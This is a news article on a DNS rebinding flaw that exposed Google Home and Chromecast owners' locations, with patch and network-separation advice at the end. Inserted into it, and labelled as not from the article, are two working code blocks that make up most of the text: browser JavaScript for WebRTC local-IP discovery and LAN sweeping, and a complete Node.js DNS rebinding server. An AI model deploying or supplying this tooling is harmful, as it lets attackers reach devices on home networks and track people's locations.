Here is a new example of the risks that come with misconfigured connected devices, an area where even Google makes mistakes. Suppose a user is quietly at home surfing the web, with a Google Home or Chromecast connected to the same local network. Security researcher Craig Young of Tripwire discovered that luring this user onto a booby-trapped website was enough to reveal their location to within a few meters. Worrying, isn't it?
This information leak stems from poor design of the devices' configuration interface. Google's connected devices can be configured from the local network through the Google Home app installed on a smartphone, but those connections are made with a low level of security: plain HTTP, with no authentication at all. A browser running on a computer on the same local network can therefore easily impersonate the app and send requests to the Google devices.
DNS Rebinding Attack
That is exactly what Craig Young's website does. Using malicious JavaScript hidden in an iframe, the trapped page first retrieves the computer's local IP address through the WebRTC API. It then walks through the other possible addresses in that local range and sends each of them the requests that expose the device's location data. As the YouTube video shows, recovering the information takes only a few minutes, and it is all the more accurate because Google positions the device from a database of Wi-Fi access points (the networks the device can see), which pins it down far better than a public IP address would.
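The browser-side part of that sweep, as an added example in JavaScript (this is not Craig Young's code and is not taken from the article): it pulls the local IPv4 address out of WebRTC ICE candidates, enumerates the rest of the /24, derives the attacker-controlled hostname that will later be rebound to each candidate, and probes the candidates with bounded concurrency and a per-probe timeout. The zone `rebind.example`, the `a-<ip with dashes>` label scheme and the `probe` callback are assumptions; the article does not name the device endpoint the real page queried, so the probe is injected by the caller and the offline test uses a constructed one.

```javascript
'use strict';
// Added example (not the article's or Craig Young's code): the client-side
// sweep a trapped page performs. ZONE and the label scheme are assumptions.
const ZONE = 'rebind.example';

// Pull an IPv4 host candidate out of an ICE candidate line from the WebRTC API.
// Most current browsers replace it with an mDNS ".local" name (the 2018 trick
// relied on it still being visible); then this returns null and a caller would
// fall back to sweeping common private ranges such as 192.168.0.0/24.
function localIpFromCandidate(line) {
  const m = /typ host/.test(line) && line.match(/\b(\d{1,3}(?:\.\d{1,3}){3})\b/);
  return m ? m[1] : null;
}

// In a browser: open a throwaway RTCPeerConnection and collect host candidates.
// Resolves to [] where WebRTC is unavailable (e.g. under Node.js).
function discoverLocalIps() {
  return new Promise((resolve) => {
    if (typeof RTCPeerConnection === 'undefined') return resolve([]);
    const ips = new Set();
    const pc = new RTCPeerConnection({ iceServers: [] });
    pc.createDataChannel('x');
    pc.onicecandidate = (e) => {
      if (!e.candidate) { pc.close(); return resolve([...ips]); }
      const ip = localIpFromCandidate(e.candidate.candidate);
      if (ip) ips.add(ip);
    };
    pc.createOffer().then((offer) => pc.setLocalDescription(offer));
  });
}

// Every other host in the /24 of the discovered address.
function sweepTargets(localIp) {
  const [a, b, c, d] = localIp.split('.').map(Number);
  const out = [];
  for (let h = 1; h <= 254; h++) if (h !== d) out.push(`${a}.${b}.${c}.${h}`);
  return out;
}

// Hostname whose DNS record the attacker's resolver will rebind to `ip`; the
// target is encoded in the label so one wildcard zone covers every candidate.
function rebindHostFor(ip) {
  return `a-${ip.replace(/\./g, '-')}.${ZONE}`;
}

// Probe all targets with bounded concurrency and a per-probe timeout.
// `probe(ip)` resolves to something truthy (e.g. a parsed device reply) or null.
async function probeAll(targets, probe, { concurrency = 8, timeoutMs = 1500 } = {}) {
  const found = [];
  let next = 0;
  async function worker() {
    while (next < targets.length) {
      const ip = targets[next++];
      let timer;
      const timeout = new Promise((r) => { timer = setTimeout(() => r(null), timeoutMs); });
      try {
        const res = await Promise.race([probe(ip), timeout]);
        if (res) found.push({ ip, res });
      } catch (_) {
        // unreachable host or refused connection: keep sweeping
      } finally {
        clearTimeout(timer);
      }
    }
  }
  const n = Math.min(concurrency, targets.length);
  await Promise.all(Array.from({ length: n }, worker));
  return found;
}
```

In a real browser the probe would be a request to each candidate on the device's HTTP port; the response is only readable by the script once DNS rebinding (described next) has made the device part of the page's own origin, which is why each candidate gets its own rebindable hostname rather than a raw IP.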
This attack relies on a well-known technique called "DNS rebinding". It is a sleight of hand that lets JavaScript loaded from the attacker's website send requests to a web server on the victim's local network while the browser still treats them as same-origin, so the script is allowed to read the replies. All the attacker needs is an authoritative DNS server for a domain they control which, when the name is resolved, first answers with the attacker's own web server (so the page and its JavaScript are fetched), then, on the next resolution, with a local address, so the script's later requests to what the browser believes is its own origin land on the device. The records carry a very short TTL to push the browser into re-resolving; browsers nevertheless cache answers for a while regardless of TTL, which is part of why the attack takes minutes rather than seconds.
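The DNS side of that trick, as an added example in Node.js (this is not the tool used in the article): a small authoritative-resolver core that answers the first lookup of a name from a given client with the attacker's web server and every later lookup with the LAN address encoded in the name, with a TTL of zero. The attacker IP `203.0.113.10`, the zone `rebind.example` and the `a-<ip with dashes>` label scheme are assumptions; the wire-format helpers are the minimum needed to answer an A query and to build one for the offline test.

```javascript
'use strict';
// Added example (not the article's tool): DNS rebinding resolver core.
// Assumptions: the attacker controls ZONE, serves the trapped page from
// ATTACKER_IP, and encodes each LAN target as "a-<ip with dashes>.<zone>".
const ATTACKER_IP = '203.0.113.10';   // TEST-NET-3 placeholder for the attacker's web server
const ZONE = 'rebind.example';

// "a.b.c" -> length-prefixed labels terminated by a zero byte.
function encodeName(name) {
  const parts = [];
  for (const label of name.split('.')) {
    parts.push(Buffer.from([label.length]), Buffer.from(label, 'ascii'));
  }
  parts.push(Buffer.from([0]));
  return Buffer.concat(parts);
}

// Minimal A query, as a stub resolver would send it (used for offline tests).
function buildQuery(name, id = 0x1234) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(id, 0);
  header.writeUInt16BE(0x0100, 2);                 // standard query, RD set
  header.writeUInt16BE(1, 4);                      // QDCOUNT = 1
  return Buffer.concat([header, encodeName(name), Buffer.from([0, 1, 0, 1])]); // QTYPE A, QCLASS IN
}

// Read id, first question name and type; queries carry no compression pointers.
function parseQuery(buf) {
  const labels = [];
  let off = 12;
  while (buf[off] !== 0) {
    labels.push(buf.toString('ascii', off + 1, off + 1 + buf[off]));
    off += 1 + buf[off];
  }
  off += 1;
  return { id: buf.readUInt16BE(0), name: labels.join('.').toLowerCase(),
           qtype: buf.readUInt16BE(off), questionEnd: off + 4 };
}

// Echo header and question, mark as authoritative answer, append one A record
// whose NAME is a compression pointer (0xC00C) back to the question at offset 12.
function buildResponse(query, q, ip, ttl) {
  const header = Buffer.from(query.subarray(0, 12));
  header.writeUInt16BE(0x8400, 2);                 // QR=1, AA=1
  header.writeUInt16BE(1, 6);                      // ANCOUNT = 1
  const rr = Buffer.alloc(16);
  rr.writeUInt16BE(0xC00C, 0);                     // NAME pointer
  rr.writeUInt16BE(1, 2);                          // TYPE A
  rr.writeUInt16BE(1, 4);                          // CLASS IN
  rr.writeUInt32BE(ttl, 6);                        // TTL
  rr.writeUInt16BE(4, 10);                         // RDLENGTH
  Buffer.from(ip.split('.').map(Number)).copy(rr, 12);
  return Buffer.concat([header, query.subarray(12, q.questionEnd), rr]);
}

// The single A record's address is the last four bytes of the response.
function answerIp(resp) {
  return Array.from(resp.subarray(resp.length - 4)).join('.');
}

class Rebinder {
  constructor(attackerIp = ATTACKER_IP, zone = ZONE) {
    this.attackerIp = attackerIp;
    this.seen = new Set();                         // (client, name) pairs already bootstrapped
    this.pattern = new RegExp('^a-(\\d{1,3})-(\\d{1,3})-(\\d{1,3})-(\\d{1,3})\\.' +
                              zone.replace(/\./g, '\\.') + '$');
  }
  // "a-192-168-1-42.rebind.example" -> "192.168.1.42"; null if not our scheme.
  targetFor(name) {
    const m = name.match(this.pattern);
    if (!m) return null;
    const octets = m.slice(1, 5).map(Number);
    return octets.every((o) => o <= 255) ? octets.join('.') : null;
  }
  // First lookup from a client: the attacker's server, so the page and its JS load.
  // Every later lookup of the same name from that client: the target on the LAN.
  resolve(name, clientKey) {
    const target = this.targetFor(name);
    if (!target) return null;
    const key = `${clientKey}|${name}`;
    if (this.seen.has(key)) return target;
    this.seen.add(key);
    return this.attackerIp;
  }
  // Wire-level handler; returns null for names or types this server does not answer.
  handle(query, clientKey) {
    const q = parseQuery(query);
    const ip = q.qtype === 1 ? this.resolve(q.name, clientKey) : null;
    return ip ? buildResponse(query, q, ip, 0) : null;   // TTL 0: re-resolve as soon as possible
  }
}

// Real UDP listener (needs a delegated zone and the privilege to bind port 53).
function serve(port = 53, rebinder = new Rebinder()) {
  const dgram = require('dgram');
  const sock = dgram.createSocket('udp4');
  sock.on('message', (msg, rinfo) => {
    const resp = rebinder.handle(msg, rinfo.address);
    if (resp) sock.send(resp, rinfo.port, rinfo.address);
  });
  sock.bind(port);
  return sock;
}
```

Keying the "already served" state on the resolver's source address is a simplification: the victim's browser usually resolves through a recursive resolver, so a real deployment keys on the name alone (one fresh name per victim and per target) and accepts that the browser will not re-resolve until its own cache entry expires. The partition-based defence described later in this article works against exactly this: the rebound request still leaves the browser, but the second router does not forward it to the device.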
According to the KrebsOnSecurity site, Google has taken note of this security flaw and intends to deploy a patch in mid-July. Until then, users of Google Home and Chromecast would do well to avoid shady sites. Another way to protect yourself is to buy a second Wi-Fi router and connect its WAN port to one of the Internet box's LAN ports. You then have two wireless networks, one for surfing the web and one for the connected objects. For the partitioning to work, the connected devices must sit behind the second router: its NAT drops unsolicited inbound connections from the box's LAN, so requests sent by a browser on the main network cannot reach the devices, while the devices themselves can still reach the Internet. The reverse arrangement, with the computer behind the second router, does not help, because its outbound connections pass straight through to the box's LAN. It is a little painful, since the phone also has to join the devices' network to control them, but much more secure.